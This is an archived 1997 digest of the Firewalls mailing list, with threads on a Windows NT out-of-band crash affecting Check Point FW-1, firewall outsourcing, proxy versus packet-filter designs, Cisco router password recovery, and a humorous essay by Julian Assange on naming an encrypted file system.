To: Jyri Kaljundi; 'Bryan D. Boyle'
Cc: firewalls@GreatCircle.COM
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

I was under the impression that since FW-1 only supported several net i/f cards that they rewrote the drivers for these, and thus managing to get between the OS and the card h/w.

[pls correct me if I'm wrong, this was only an assumption!]

Pete

----------
From: Bryan D. Boyle
Sent: 05 June 1997 13:46
To: Jyri Kaljundi
Cc: firewalls@GreatCircle.COM
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

At 03:08 PM 6/5/97 +0300, you wrote:
>You mean you can crash an NT FW-1 by sending OOB data to it?!
>That's scary if it is true and should be addressed by Check Point ASAP!
>

It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS.

>What I have always thought of FW-1 is that it operates at quite low level
>inside the OS kernel, that as long as you filter everything the network
>bugs in the OS don't really matter, as the packets never reach FW-1.

Nothing except MS code operates in the NT kernel. This problem is with what happens when you send oob data to a stack (MS) that is tightly integrated with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS interface and control mechanism itself is crap.

Of course, on UN*X systems, this is not the case. This is a signal example of the difference between designing for peer review of your security model and designing for what gets good trade publication reviews.

>
>If sending some bytes of data to FW1 crashes it and the OS, this
>combination (FW1+NT) should not be used as a firewall solution at all. May
>be someone from CP could explain, how much do the bugs in the OS matter
>once FW1 is installed.

If there is an overall architectural problem with NT as it is, then the OS bugs matter A LOT.
But, of course, those that say you can trust a black box solution since the vendors are trustworthy are quite quiet in this regard...

I would agree that you should ignore NT as an OS platform in a security solution right now.

Just my opinion, $.02 US, etc. Flames to /dev/null.

--
Bryan D. Boyle          | LOGICAL: bdboyle@att.com 201-386-8584
#include                | VIRTUAL: http://www.access.digex.net/~bdboyle
AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ
                        | HISTORICAL: HQ, 6th Battalion, Army of No. VA.
"What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?" -Thomas Jefferson, 1787

From owner-firewalls-outgoing Fri Jun 6 01:50:06 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA07203 for firewalls-outgoing; Thu, 5 Jun 1997 12:11:36 -0700 (PDT)
Received: from gate3.fmr.com (gate3.fmr.com [192.223.170.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA07181 for ; Thu, 5 Jun 1997 12:11:26 -0700 (PDT)
Received: (from adm@localhost) by gate3.fmr.com (8.7.3/8.6.9) id PAA08120 for ; Thu, 5 Jun 1997 15:15:24 -0400 (EDT)
Received: from msgbos100nts.fmr.com(137.199.100.25) by gw01i via smap (g3.0.3) id xma008046; Thu, 5 Jun 97 15:15:07 -0400
Received: by msgbos100nts.fmr.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52) id <01BC71C3.40025F70@msgbos100nts.fmr.com>; Thu, 5 Jun 1997 15:15:06 -0400
Message-ID:
From: "Feeney, Tim"
To: "firewalls@GreatCircle.COM"
Subject: RE: ISP Connection
Date: Thu, 5 Jun 1997 15:09:00 -0400
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>From: BLeBlanc@igate.sprint.com
>
>Having a third party perform the administrative functions must be
>determined by weighing many factors.
>You need to decide:
>
>"Which security technology is best for my environment? (based on your
>security policy - what type(s) of security need to be deployed?
>Firewall? Strong Authentication? Encryption? and what/who are you trying
>to secure?)
>
>"Who are the respected and reliable vendors in the market?" (this must
>include the third party that you are considering doing the management,
>as well as, the vendor/manufacturer of the security products
>themselves).

A bit beyond the respect and reliability factor is the security factor for the vendor. You need to check to see that their systems are secured properly so that a successful attack on the vendor does not compromise your company. In addition, if your company does exhaustive background checks on employees, then the vendor's background checks for their employees should be at the same level or higher. Remember that the vendor now has access to your internal network and can "spy" on you without you even knowing. In addition, make sure that your machine is fairly isolated from the vendor's other customers' machines, as these customers could have access to your network if the setup of the vendor's network allows it.

>Obviously, monetary cost factors come into play. Whether you buy the
>hardware/os/software and manage the components in-house -vs- you
>out-source these to a third party and pay month-to-month.
>
>Do you have the staff to manage the firewall in-house? (A firewall is
>NOT a collateral duty to be assigned to a data center's staff that has
>no background in firewalls). What level of expertise does the
>third-party have? (Your third-party vendor should have a significantly
>sized team of security engineers that have substantial background and
>knowledge in the security areas you need/choose).

I would also suggest that you bring someone up to speed on security mechanisms and issues. It would behoove you to have someone that could check that the vendor is doing things in the proper manner.
This person need not have expertise in installing and setting up secure environments but should be able to at least know the ramifications of, and defense against, various attacks and setups.

>What standard services does the third party perform? You (the customer)
>must have the ability to sit with the third party and "design a
>unique-to-you" security service. YOU must be able to determine the
>rules. You must have the power to change those rules at any time
>(24*7*365).
>
>What value-added services does the third party perform? Do they perform
>monitoring for suspicious activity? Do they perform backups on all of
>the critical files and maintain them off-site (this should be part of
>your disaster recovery plan for all systems)? Do they provide you with
>a detailed report of what happened on the firewall?
>
>Once you have weighed these issues (these being a sample of the total
>questions you need to ask yourself and the third-party provider), you
>should be able to make a determination on whether to handle the task
>in-house or out-source.

On a bit of a side note: I have dealt with BBN and come to feel that they are a very professional and knowledgeable group. However, be prepared to go through a few steps to make changes or updates to your system. They require certain procedures to be followed before any change is implemented. This is a good thing but it does tend to slow the change process up a bit.
Tim

From owner-firewalls-outgoing Fri Jun 6 01:59:29 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA15938 for firewalls-outgoing; Thu, 5 Jun 1997 12:58:49 -0700 (PDT)
Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id MAA15901 for firewalls@greatcircle.com; Thu, 5 Jun 1997 12:58:33 -0700 (PDT)
Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA09438 for ; Tue, 3 Jun 1997 09:00:35 -0700 (PDT)
From: proff@suburbia.net
Received: from suburbia.net (suburbia.net [198.142.2.24]) by pdx1.world.net (8.7.5/8.7.3) with SMTP id JAA21777 for ; Tue, 3 Jun 1997 09:07:08 -0700 (PDT)
Received: (qmail 26297 invoked by uid 110); 3 Jun 1997 16:03:44 -0000
Message-ID: <19970603160344.26296.qmail@suburbia.net>
Subject: Cryptographic Mythology
To: firewalls@greatcircle.com
Date: Wed, 4 Jun 1997 02:03:43 +1000 (EST)
X-Mailer: ELM [version 2.4ME+ PL28 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Here is something to amuse, delight and horrify - the tail of:

_One Man's Search for a Cryptographic Mythology_.

I recently wrote a VNODE (4.4bsd) based encrypted file-system. Now the day dawned when I decided it was high time to discard my rather egocentric working name _Proffs_ (i.e. Proff File System) and cast about for a decent, respectable name.

My first thought on this matter was:

    CERBERUS, n. The watch-dog of Hades, whose duty it was to guard the entrance -- against whom or what does not clearly appear; everybody, sooner or later, had to go there, and nobody wanted to carry off the entrance. Cerberus is known to have had three heads, and some of the poets have credited him with as many as a hundred.

Only, what was the relation between KERBEROS and CERBERUS? Pups from the same litter, or was the relationship a little more incestuous?
I had to find out. There was no way - n o w a y - I'd be having my encrypted file system playing second fiddle to that evil authentication beast.

    KERBEROS; also spelled Cerberus. n. The watch dog of Hades, whose duty it was to guard the entrance--against whom or what does not clearly appear; . . . it is known to have had three heads. . .

Mythology couldn't get any more incestuous than that.

450,000 bytes of Greek polytheism later, and I'm wondering if the Gods of Olympus really had any high-paid guards to speak of except the multi-headed mongrel from Hades. I'm feeling down. I'm cursing the Ancients. I'm disrespectfully humming tunes `All and All it's Just Another Greek in the Wall', and `Athena be my Lover' when I discover:

    JANUS: in Roman mythology, custodian of the universe, god of beginnings. The guardian of gates and doors, he held sacred the first hour of the day, first day of the month, and first month of the year (which bears his name). He is represented with two bearded faces set back to back.

Custodian of the universe. Guardian of gates and doors. Cooool. Janus. January. I like it.

Only while I'm liking it, I'm thinking that I've heard the word Janus a lot before. I'm thinking it isn't just me who has looked up from the middle of a Greek mythology text, whilst in the throes of a name hunt with the words "Cooool" on their tongue. No: the Gods just don't smile on me that way.

AltaVista confirms the truth of Heaven's bad attitude towards me. 17,423 references. _The Janus Mutual Trade Fund_, _The Janus Project_, _Janus ADA95_, a dozen ISPs from Canada (what is it WITH these Canadians?), _Janus' cool word list_ (turns out to be not so cool), _The Janus Ensemble_, _Hotel Janus_, _Janus Theatre_, _janus.com_, _janusfunds.com_, _Janus_ an Australian Police drama series and of course, the sixth moon of Saturn - _Janus_.

Janus is out-of-the-picture. I'm not sure whether to feel smug or grim about the rest of the world's lack of originality.

Guards. Guardians.
The Greeks didn't have many with bite and I'm losing patience with the whole culture. Euphrosyne, Aglaia, and Thalia do not grace me. What I need is something that evokes passion within my cryptographic domain. And when you come down to it, that means something which produces copious amounts of gore and blood, at will, from those who would dare to pass its demesne of protection.

    The Erinyes, or Furies, were three goddesses who punished by their secret stings the crimes of those who escaped or defied public justice. The heads of the Furies were wreathed with serpents, and their whole appearance was terrific and appalling. Their names were Alecto, Tisiphone, and Megaera. They were also called Eumenides.

Aye. Plenty of gore there. But somewhat lacking in cryptographic analogy. Fantastic material for the group that doesn't meet at number 41 every Saturday night though. They will appreciate what the Erinyes were trying to achieve.

Somewhat heartened, my mind turns to the Erinyes' dress sense. "..heads of the Furies were wreathed with serpents, and their whole appearance was terrific and appalling".

Terrific. Serpents.

    Terrific \Ter*rif"ic\, a. [L. terrificus; fr. terrere: to frighten + facere: to make. See Terror, and Fact.] Causing terror; adapted to excite great fear or dread; terrible; as, a terrific form; a terrific sight.

Is it a symptom of society in decay that this word has come to mean:

    Excellent \Ex"cel*lent\, a. [F. excellent, L. excellens, -entis, p. pr. of excellere. See Excel.] 1. Excelling; surpassing others in some good quality or the sum of qualities; of great worth; eminent, in a good sense; superior, as an excellent man, artist, citizen, husband, discourse, book, song, etc.; excellent breeding, principles, aims, action.

Or as Milton would say:

    To love . . . What I see excellent in good or fair.
On the other hand, David Hume (1711-1776):

    The more exquisite any good is, of which a small specimen is afforded us, the sharper is the evil, allied to it; and few exceptions are found to this uniform law of nature. The most sprightly wit borders on madness; the highest effusions of joy produce the deepest melancholy; the most ravishing pleasures are attended with the most cruel lassitude and disgust; the most flattering hopes make way for the severest disappointments. And, in general, no course of life has such safety (for happiness is not to be dreamed of) as the temperate and moderate, which maintains, as far as possible, a mediocrity, and a kind of insensibility, in every thing.

Perhaps it is the sign of a brain in decay, rather than a society, that I dwell on it so, because Terrific hair serpents of course lead unfailingly into the arms of the Medusa. A guardian of fearsome looks, but dubious motivations according to authorities like Clash of the Titans (1981). A moot point, perhaps, as Princeton's history department no longer wants to talk to me. I'm cast adrift, to rely on my Plasticine childhood memories and the mythological swamp of the web.

    NAME: Medusa
    FAVORITE PASTIME: Turning men to stone
    PLACE OF ORIGIN: Los Alamos Secret CIA Lab
    SPECIAL GIFTS: Petrified Aggregate Projectist
    FAVORITE MOVIE: Mighty Morphin' Power Rangers
    GOALS IN LIFE: To be a nice person
    FAVORITE BOOK: Madonna's biography
    PET PEEVE: Bad hair days

Jesus. I've been sucked into comic book hell. Princeton, take me back. I won't curse at the ancient Greeks' sexual proclivities anymore. I'm sure chaste marriages were very daunting to those yet to have them. I was only joking. Lighten up will you?

But, alas, the history faculty however was still nursing its wounds, and was not ready to forgive me. I'd have to find an authoritative source somewhere else. Perhaps I could filter out the comic book hell contaminants and come up with respected history Ivy, even if it wasn't Princeton Ivy.
    To decapitate - to castrate. The terror of the Medusa is thus a terror of castration that is linked to the sight of something. The hair upon the Medusa's head is frequently represented in works of art in the form of snakes, and these once again are derived from the castration complex. It is a remarkable fact that however frightening they may be in themselves, they nevertheless serve as a mitigation of the horror, for they replace the penis, the absence of which is the cause of the horror. This is a confirmation of the technical rule according to which a multiplication of penis symbols signifies castration.

    Sigmund Freud
    The Medusa's Head

You had to hand it to Sigmund. He was nothing if not authoritative, and after reading his inspiring words on the terrific serpent haired woman, it became clear to me that _Proffs_ and the Gorgon had somewhat unresolved metaphorical incompatibilities. I didn't want my software giving anyone a castration complex. I decided to put aside the denizens of Olympus from contest verbatim. I'd read Fraud on Perversions a few years before and knew Medusa was just a portent of what was to come. What I needed was another polytheist culture entirely.

Latin didn't help me. Nearly all the Roman Gods had been vilely plagiarised from the Greeks, Latin names or not. Freud knew this as well as I did.

The Norse gods were of little assistance to me. The only one worth paying school to was Loki, the Norse god of mischief. Loki was a very cool fellow, which was why his name has been appropriated as a moniker by virtually every Bjorn, Sven, and Bob hacker to come out of Scandinavia in the last 10 years. No, Loki was not for me.

The problem craved for a polytheist mythology outside the realm of my, and more importantly Sigmund Freud's, Western European upbringing. The answer to my question was by definition locked within a body of history I didn't know an onion skin about.
    In order for the pilgrim to reach the master he must first place his foot on the path, no matter how gradual the slope up the mountain of enlightenment.

Zen Buddhism is good like that. Fabricating parables up as you go along that is.

    Zen master Gutei raised his finger whenever he was asked a question about Zen. A young novice began to imitate him in this way. When Gutei was told about the novice's imitation, he sent for him and asked him if it were true. The novice admitted it was so. Gutei asked him if he understood. In reply the novice held up his index finger. Gutei promptly cut it off. The novice ran from the room, howling in pain. As he reached the threshold, Gutei called, "Boy!". When the novice returned, Gutei raised his index finger. At that instant the novice was enlightened.

But wait. This Koan isn't fabricated. At least, not by me. And unlike most Zen Koans I think you will agree that it pleasantly satisfies Schopenhauer's "life, without pain, has no meaning". However, semantically I'm seeing a very unhealthy correlation to forgetting one's encryption key and losing one's finger.

My mind is drawn to the memory of the real-life nightmare of lying in the easy-chair of a Swanston St. hypnotherapist suite, gazing intently into a bright, but distant red light, while chanting the mantra "I am not cynical about hypnotherapy. I am not cynical about hypnotherapy. I am not cynical about an Indian doctor with a 5th floor office decorated coup'd'Edelstien. I'm not cynical about a man who claims that his foremost clientele are rich middle aged women who have put their jewellery somewhere "safe" and consequently are unable to recall the location. I'm not cynical about a hypnotist who extols the virtues of having a M.D. so his patients can claim 2/3rds of the cost of these jewellery retrieval sessions under Medicare. I'm not cynical that these middle aged women are in fact suffering from some form of Mesmer complex.
And by all the powers in Heaven, I have no pessimism about recalling my god-damned pass-phrase!".

I never did remember the pass-phrase and you will notice Gutei keeps very quiet about what he does with the novice's finger. In this particular case, given the value of the data, I would have traded places with Gutei's novice, before you can say "Boy! Was I enlightened".

I put my chin on my knee, and stare at the grain of my beige plastic monitor case. Unless I could jump into another reality it was the end of the line for _Proffs_ and _One Man's Search for a Cryptographic Mythology_.

Boy! Was I bummed.

One of the great sins of us programmers is procedural thinking. And it was exactly this sort of folly I was engaging in. There were around 6 billion other realities going about their business. I grant you that 2 billion of these were no doubt indulging in the confusion and diffusion of an avalanche of pseudo-random mental images and sequences we associate with dreams, and probably another 2 billion busy expanding their minds with the powerful products of hash or decaying into a compressive state of increasing entropy and beer rounds. This still left a select 2 billion souls with which to weave my work. If I approached them directly rather than by analysing the information trails they left behind, I'd stand a good chance of getting my feet onto the path of cryptographic mythological enlightenment.

I have a Swedish friend who calls himself Elk on odd days and Godflesh on even days. Don't ask why. As far as I know he's not bisexual. Elk listened to my quest for cryptographic myth. He had pondered, and uncovered a diamond in the rough.

MARUTUKKU.

    The third name is MARUTUKKU, Master of the arts of protection, chained the Mad God at the Battle. Sealed the Ancient Ones in their Caves, behind the Gates.

F a r o u t.

Master of the arts of protection. Chained the Mad God. Sealed the Ancient Ones in their Caves, behind the Gates.
Even the very word MARUTUKKU looks like it has been run through a product cipher.

But I wasn't about to trust the work of a self-admitted Swedish Sumeria freak who was obviously suffering from a bi-polar moniker disorder. Was it mere coincidence that MARUTUKKU was an anagram for KUKU MART and KUKU TRAM? I didn't want MARUTUKKU to end up as another cog in the annals of Freudian analogy. What I needed was the sort of Authoritative History that only Princeton's history faculty could provide.

    The tablets of the Enuma Elish: The Akkadian Creation Epic

    Based on the translation of E. A. Speiser, with the additions by A. K. Grayson, Ancient Near-Eastern Texts Relating to the Old Testament, third edition, edited by James Pritchard (Princeton, 1969), pp. 60-72; 501-503, with minor modifications.

    This work, the ancient Mesopotamian creation epic consisting of seven tablets, tells of the struggle between cosmic order and chaos. It is named after its opening words. It was recited on the fourth day of the ancient Babylonian New Year's festival. The text probably dates from the Old Babylonian period, i.e., the early part of the second millennium B.C.E.

    [...]

    The third name is MARUTUKKU Master of the arts of protection, chained the Mad God at the Battle. Sealed the Ancient Ones in their Caves, behind the Gates.

    [...]

    MARUTUKKU truly is the refuge of his land, city, and people. Unto him shall the people give praise forever. All praise the MARUTUKKU!

My search had borne a ripe and tasty fruit indeed. The quest for a cryptographic mythology was complete.

Or was it?

The words of Hume kept coming back to me and I had a nagging feeling that there was some substance in them. If MARUTUKKU was my exquisite cryptographic good, of wit, effusive joy, ravishing pleasure and flattering hope; then where was the counterpoint? The figure to its ground - the sharper evil, the madness, the melancholy, the most cruel lassitudes and disgusts and the severest disappointments. Was Hume right?
Because if he was, there was only one organisation this string of hellish adjectives could represent. The cryptographic devil with its 500,000 sq feet of office space in Maryland. But surely there could be no reference to such an organisation in the 4,000 year old Babylonian tablets. The idea was preposterous. Wasn't it? TABLET VII OF THE ENUMA ELISH: ESIZKUR shall sit aloft in the house of prayer; May the gods bring their presents before him, that from him they may receive their assignments; none can without him create artful works. Four black-headed ones are among his creatures; aside from him no god knows the answer as to their days. It's a cold and wintry night, here in Melbourne. Despite this, the gusts of wind and rain seem to be unusually chilling. What had I, in my search for a cryptographic mythology, stumbled onto? I look hard at the seven letters E-S-I-Z-K-U-R. A frown turns to a smile and then a dead pan stare. I write down: IRK ZEUS -- Prof. Julian Assange |If you want to build a ship, don't drum up people |together to collect wood and don't assign them tasks proff@iq.org |and work, but rather teach them to long for the endless proff@gnu.ai.mit.edu |immensity of the sea. 
-- Antoine de Saint Exupery From owner-firewalls-outgoing Fri Jun 6 02:31:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25631 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:57 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25527 for ; Fri, 6 Jun 1997 00:51:21 -0700 (PDT) Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26113; Fri, 6 Jun 1997 09:52:17 +0200 (METDST) Message-Id: <3.0.32.19970606095033.0068dae8@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 06 Jun 1997 09:54:54 +0000 To: "Jonathan M. Bresler" , Cy Ardoin From: Eric Vyncke Subject: Re: PIX and FW-1 (packet filter Question) Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 13:18 5/06/97 -0400, Jonathan M. Bresler wrote: > >>I don't think there is anything an application firewall can >>do that can't also be done by a "packet filter" firewall. The > > trivial example: > a smtp application level proxy can disable the "debug" command >for every sendmail behind that firewall. This kind of stuff is also done in some full-state inspection firewalls :-) > >>new packet filter firewalls are not like the old Cisco/Bay router >>filters. The new systems operate at the network layer, but they >>have knowledge of the protocols and applications. They >>open up the packets and modify the data. These systems are >>doing content filtering and other "application" types of operations. >>Yes, not all of them do these things, but many do, and new >>feature/functions are being added to these systems every year. > >jmb > > >-- >Jonathan M. 
Bresler 202-452-2831 breslerj@frb.gov >MS-169 Federal Reserve Board of Governors Washington DC 20551 >Speaking for myself. Others speak for the Federal Reserve Board of Governors > > Eric Vyncke Technical Consultant Cisco Systems Belgium SA/NV Phone: +32-2-778.4677 Fax: +32-2-778.4300 E-mail: evyncke@cisco.com Mobile: +32-75-312.458 From owner-firewalls-outgoing Fri Jun 6 03:10:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA25267 for firewalls-outgoing; Thu, 5 Jun 1997 08:07:29 -0700 (PDT) Received: from venus.milehigh.net ([207.78.104.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA25227 for ; Thu, 5 Jun 1997 08:07:20 -0700 (PDT) Received: from sysbrien ([207.78.104.27]) by venus.milehigh.net (post.office MTA v1.9.3b ID# 0-17836) with SMTP id AAA41 for ; Thu, 5 Jun 1997 09:13:44 +0100 Message-ID: <3396817F.7BE@milehigh.net> Date: Thu, 05 Jun 1997 09:06:07 +0000 From: syscrash@milehigh.net (Brian Delgado) Reply-To: syscrash@milehigh.net X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: Raptor firewall Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am kind of a beginner at this so I apologize if this question is basic, but I figured this would be the best forum to get a valid answer. Here is my question: I am setting up Raptor on a Windows NT 4.0 server. I am currently running DNS on a SUN platform for internal name resolution. I realize that Raptor is an application gateway. Does this mean I have to run my name server on the Bastion host or can I continue to run it where I am currently? Any help would be appreciated. 
Brien Delgado From owner-firewalls-outgoing Fri Jun 6 03:16:52 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA29599 for firewalls-outgoing; Thu, 5 Jun 1997 22:31:29 -0700 (PDT) Received: from glacier.wise.edt.ericsson.se (glacier-ext.wise.edt.ericsson.se [193.180.251.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA29533 for ; Thu, 5 Jun 1997 22:31:10 -0700 (PDT) Received: from geek (geek.nmac.ericsson.se [130.100.187.83]) by glacier.wise.edt.ericsson.se (8.7.5/8.7.3/glacier-0.9) with ESMTP id HAA15940 for ; Fri, 6 Jun 1997 07:35:08 +0200 (MET DST) Received: from haig.oplab.nmac.ericsson.se (haig.oplab.nmac.ericsson.se [130.100.187.85]) by geek (8.8.5/8.8.5) with ESMTP id FAA04693 for ; Fri, 6 Jun 1997 05:36:54 +0200 Received: by haig.oplab.nmac.ericsson.se with Internet Mail Service (5.0.1457.3) id ; Fri, 6 Jun 1997 07:35:04 +0200 Message-ID: <43BED8177D10D011A69A0800092C15D7011BFD@haig.oplab.nmac.ericsson.se> From: =?iso-8859-1?Q?Robert_St=E5hlbrand?= To: "'Mike Hedlund'" Cc: "'firewalls@greatcircle.com'" Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts Date: Fri, 6 Jun 1997 07:35:01 +0200 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What is the problem here??? Of course (as Mike Hedlund says) is a NT-machine (win95 and win3.11 as well) only vulnerable to the OOB-bug on port 139 (netbios) and I REALLY HOPE that not anyone let this service through their firewall. And even if you are using a NT firewall (nuts but anyway) this should really be no problem. So, what is the problem??? Robert St=E5hlbrand Network-, System-responsible NMAC and OPLAB domains. 
Ericsson Telecom AB Box 333, Fl=F6jelbergsgatan 1C 43124 M=F6lndal Phone number +46 31 7476162 Fax number +46 31 7473777 Email: robert.stahlbrand@nmac.ericsson.se > -----Original Message----- > From: Mike Hedlund [SMTP:mike@isi.net] > Sent: den 5 juni 1997 20:05 > To: Daniel Strawson > Cc: Jyri Kaljundi; Greg Loffel; fw-1-mailinglist@us.checkpoint.com; > Firewalls mailing list > Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts >=20 >=20 >=20 > If i remember correctly, the OOB attack with NT only effected port > 139, > NetBios. I tried it on all other tcp ports and it had no effect. So > the > only way Firewall-1 would be effected by it would be if it has its = own > bug.. altho i could be mistaken.. if i am somone please correct me. = :) >=20 > -mike >=20 > [Robert St=E5hlbrand] =20 > Absolutely correct!!!=20 > On Thu, 5 Jun 1997, Daniel Strawson wrote: >=20 > >=20 > > Hang on a moment. > >=20 > > Let me put this in perspective. > >=20 > > As I understand it, this problem results from sending packets with = a > > particular IP option set in the header. (Please confirm I'm right > here > > someone). > >=20 > > Firewall _SHOULD_ drop all packets with IP options set. This would > mean > > that all Firewall-1 systems and systems behind Firewall-1 are > impervious > > to this attack. (something for Checkpoint to be proud of). > >=20 > > Unfortunately this is not the case - as I say I've managed to get = NT > to > > crash with FW-1 installed. > >=20 > > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 > to > > crash, you get the NT system that it is running on to crash, so it > is not > > an insecurity, but a claimed feature that doesn't work. > >=20 > > So, either - > >=20 > > - The IP Options drop code in FW-1 doesn't work. > >=20 > > or > >=20 > > - I do not properly understand this attack and it does not work as > I > > imagine - in this case, please correct me. 
> >
> > Cheers,
> >
> > Daniel
> >
> >
> > On Thu, 5 Jun 1997, Jyri Kaljundi wrote:
> >
> > > On Wed, 4 Jun 1997, Daniel Strawson wrote:
> > >
> > > > We tried it and, yes we managed to crash an NT based Firewall-1 system.
> > > > This is odd since (if memory serves) the packets should be dropped on the
> > > > floor by the stateful inspection module.
> > >
> > > You mean you can crash an NT FW-1 by sending OOB data to it?!
> > > That's scary if it is true and should be addressed by Check Point ASAP!
> > >
> > > What I have always thought of FW-1 is that it operates at quite low level
> > > inside the OS kernel, that as long as you filter everything the network
> > > bugs in the OS don't really matter, as the packets never reach FW-1.
> > >
> > > If sending some bytes of data to FW1 crashes it and the OS, this
> > > combination (FW1+NT) should not be used as a firewall solution at all. May
> > > be someone from CP could explain, how much do the bugs in the OS matter
> > > once FW1 is installed.
> > >
> > > Jüri
> > >
> > >
> >
> >

From owner-firewalls-outgoing Fri Jun 6 03:44:00 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA20259 for firewalls-outgoing; Thu, 5 Jun 1997 19:13:09 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA20224 for ; Thu, 5 Jun 1997 19:12:58 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id TAA10617 for ; Thu, 5 Jun 1997 19:20:26 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA23601; Thu, 5 Jun 97 19:18:43 PDT
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id TAA13786 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Thu, 5 Jun 1997 19:17:38 -0700 (PDT)
Message-Id: <199706060217.TAA13786@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 795ED84F44DAAEF7882564AE000D0505; Thu, 5 Jun 97 19:17:36 EDT
To: "Steve Rudolph"
Cc: "David Harvey-George" , firewalls
From: Ryan Russell/SYBASE
Date: 5 Jun 97 19:24:08 EDT
Subject: Re: FW-1 and IP Forwarding on NT Box
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Retrieving and/or resetting the Cisco password is fairly trivial if there is a console port on that card.. haven't used the card version, but I've done it on real 2500's many times. Search the Cisco web site for "password recovery." If they've turned on password encryption, you can either change the password, or do a web search for Cisco password crackers, I've seen a couple. Haven't tried those.
Ryan

---------- Previous Message ----------
To: david, firewalls
cc:
From: srudolph @ datacommcorp.com ("Steve Rudolph") @ smtp
Date: 06/05/97 08:26:39 AM
Subject: Re: FW-1 and IP Forwarding on NT Box

David and group....

I have already got this running. Thank you to all who responded to my inquiry. I have learned a lot just from the replies. I left my brain in the shower that day..... I forgot to set the Default Gateway on EACH machine on both networks to the NIC in the router on that machine's network.

Now I just need to crack the router password for a Cisco AccessPro 2500 PC card. This piece of equipment came in a firewall disguise called MCI Webmaker. This was a combination port filter router and proxy server. As it turns out Intel programmed the software (proxy), and configured the router. Vanstar installed the OS (NT), and none of the above are able to get me the router password. Right now my DNS is being partially blocked because of this (I know very little about DNS, any good books? I am using MS DNS-OK for now (:o) ).

I contacted Cisco and the only way to break the password is to send a break to the com port (remember it is a PC card) in terminal mode within 60 seconds. And then begin the recovery sequence. Kind of hard to do with NT or 95. I can't seem to find a copy of DOS 5.0 or an old hard drive anywhere with a DOS based terminal program.

This whole situation is messed. My employer wants to wait to use the router and not buy a new one. It is holding up US$40K in billing though. Can anyone help, or if you have a similar problem let me know and I will get you the correct person to call.

Thanks again

Steve Rudolph
http://www.datacommcorp.com
srudolph@datacommcorp.com
http://www.rude-dog.com
http://www.rust.net/~stever
stever@rust.net

----------
> From: David Harvey-George
> To: Steve Rudolph ; firewalls@greatcircle.com
> Subject: Re: FW-1 and IP Forwarding on NT Box
> Date: Wednesday, June 04, 1997 7:14 PM
>
> > I followed all of Microsoft's recommendations.
> Possibly a bad move.
>
> > Two NIC cards a and b
>
> Sounds like the start of a stand-up comedy routine
>
> > A is set with default gateway of b
> > and b is set with gateway of a
>
> it is!
>
> Okay, look, the system with the two cards knows how to route to each
> network. All you've gotta do is set up the default gateway for
> workstations on network A (NIC A) and the default gateway for workstations
> on network B (NIC B). Don't touch anything on the router if your network
> really is this simple (e.g. no other routes). If you have other routes
> then use the route command directly.
>
> > Workstations can ping a and b
